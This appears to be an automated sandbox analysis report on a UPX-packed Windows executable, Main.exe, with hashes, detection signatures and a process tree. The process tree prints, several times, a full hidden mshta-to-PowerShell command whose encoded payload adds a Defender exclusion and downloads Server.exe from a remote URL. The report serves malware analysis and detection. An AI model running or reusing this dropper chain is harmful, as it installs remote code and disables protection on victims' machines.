Analysis

  • max time kernel
    34s
  • max time network
    33s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-07-2024 15:56

General

  • Target

    Main.exe

  • Size

    54KB

  • MD5

    43dad7e79501c9a582ac3029e202c022

  • SHA1

    ca65c14bc3d9f9866474f5d6c360fbb86d8fd7d7

  • SHA256

    9dfbea040f243f9bd53e021233cfd06cb7c1a077367ee981d8fa61e622675398

  • SHA512

    5e0d492d3eedf7476b70a1659b8d0330b1df367d5538a7e5b02186127a47fc40bc2666669f4e091f6561be77826c61d0006f8b5174ba464d0ba3b570fb4f59f5

  • SSDEEP

    1536:+BiHZIDQpZSfo12aUwww42Rlfp4KVVHw:+Bi5/ZxuYxp4KV

Score
7/10
upx

Malware Config

Signatures

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Main.exe
    "C:\Users\Admin\AppData\Local\Temp\Main.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3740
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cmd /c start /min "" mshta "javascript:var shell=new ActiveXObject('WScript.Shell'); shell.Run('powershell.exe -w Hidden -NoP -ExecutionPolicy Bypass -EncodedCommand YwBkACAAJABlAG4AdgA6AFUARQBSAFMAPQAkAGUAbgB2ADoAVQBTAEUAUgBQUk9GSUxFAFAAOwAgAGMAYwBEAGUAcwBrAHQAbwBQAFwAUgBhAHQAdABlAHIAcwB0AG8AbwBmADsAIABtAGsAZABpAHIAIABUAE0AUAA7ACAAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEYAYQBuAHQAYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAVABNAFAAOwAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AdQBuAGIAbABvAGMAawBlAGQAZwBhAG0AZQBzADIALwB6AHYAZwBmAGQALwByAGEAdwAvAG0AYQBpAG4ALwBTAGUAcgB2AGUAcgAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAVABNAFAAXABTAGUAcgB2AGUAcgAuAGUAeABl', 0); close();"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4944
      • C:\Windows\system32\cmd.exe
        cmd /c start /min "" mshta "javascript:var shell=new ActiveXObject('WScript.Shell'); shell.Run('powershell.exe -w Hidden -NoP -ExecutionPolicy Bypass -EncodedCommand YwBkACAAJABlAG4AdgA6AFUARQBSAFMAPQAkAGUAbgB2ADoAVQBTAEUAUgBQUk9GSUxFAFAAOwAgAGMAYwBEAGUAcwBrAHQAbwBQAFwAUgBhAHQAdABlAHIAcwB0AG8AbwBmADsAIABtAGsAZABpAHIAIABUAE0AUAA7ACAAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEYAYQBuAHQAYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAVABNAFAAOwAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AdQBuAGIAbABvAGMAawBlAGQAZwBhAG0AZQBzADIALwB6AHYAZwBmAGQALwByAGEAdwAvAG0AYQBpAG4ALwBTAGUAcgB2AGUAcgAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAVABNAFAAXABTAGUAcgB2AGUAcgAuAGUAeABl', 0); close();"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4060
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var shell=new ActiveXObject('WScript.Shell'); shell.Run('powershell.exe -w Hidden -NoP -ExecutionPolicy Bypass -EncodedCommand YwBkACAAJABlAG4AdgA6AFUARQBSAFMAPQAkAGUAbgB2ADoAVQBTAEUAUgBQUk9GSUxFAFAAOwAgAGMAYwBEAGUAcwBrAHQAbwBQAFwAUgBhAHQAdABlAHIAcwB0AG8AbwBmADsAIABtAGsAZABpAHIAIABUAE0AUAA7ACAAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEYAYQBuAHQAYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAVABNAFAAOwAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AdQBuAGIAbABvAGMAawBlAGQAZwBhAG0AZQBzADIALwB6AHYAZwBmAGQALwByAGEAdwAvAG0AYQBpAG4ALwBTAGUAcgB2AGUAcgAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAVABNAFAAXABTAGUAcgB2AGUAcgAuAGUAeABl', 0); close();"
          4⤵
            PID:4044

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/3740-0-0x00007FF6EE180000-0x00007FF6EE1A5000-memory.dmp

      Filesize

      148KB

    • memory/3740-1-0x00007FF6EE180000-0x00007FF6EE1A5000-memory.dmp

      Filesize

      148KB